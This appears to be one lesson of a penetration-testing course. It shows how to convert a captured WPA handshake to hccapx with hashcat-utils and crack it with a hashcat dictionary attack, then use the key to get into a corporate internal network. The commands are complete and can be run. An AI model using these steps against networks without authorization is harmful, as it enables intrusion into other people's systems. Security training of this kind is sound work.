65 WiFi Hijacking Hashcat Part 10

After we have successfully captured a 4-way handshake with a tool such as airodump-ng, we need to convert it to hccapx format that can be provided to Hashcat for cracking.

Convert to hccapx format

The required format is hccapx, and Hashcat hosts an online service to convert to this format https://hashcat.net/cap2hccapx


To do the conversion offline, we need the hashcat-utils repository from GitHub.

We can clone the repo and build the tool as follows:

$ git clone https://github.com/hashcat/hashcat-utils.git
$ cd hashcat-utils/src
$make


Cap2hccapx - Syntax
$ ./cap2hccapx.bin
usage: ./cap2hccapx.bin input.cap output.hccapx [filter by essid] [additional network essid:bssid]


Next, we need to provide the tool with a packet capture (.cap) file to convert to hccapx format to provide to Hashcat.
$ ./cap2hccapx.bin corp_capture1-01.cap mic_to_crack.hccapx

Networks detected: 1

[*] BSSID=cc:40:d0:a4:d0:96 ESSID=CORP-WIFI (Length: 9)
-- STA=48:e2:44:a7:c4:fb, Message Pair=0, Replay Counter=1
-- STA=48:e2:44:a7:c4:fb, Message Pair=2, Replay Counter=1
-- STA=48:e2:44:a7:c4:fb, Message Pair=0, Replay Counter=1
...
Written 8 WPA Handshakes to: /home/mrb3n/Desktop/mic_to_crack.hccapx



With this file (mic_to_crack.hccapx), we can then proceed to crack
For this example, we will perform a straight dictionary attack to crack the WPA handshake.

To create a dictionary of words for the attack we will use rockyou.txt,
Crunch is a Linux tool that can be used by you as well.

To try to crack this hash, we'll use mode 2500, so our command will show

hashcat -a 0 -m 2500 mic_to_crack.hccapx cell.txt --deprecated-check-disable


Armed with this key, we can now attempt to authenticate to the wireless network and attempt to gain access to the company's internal network.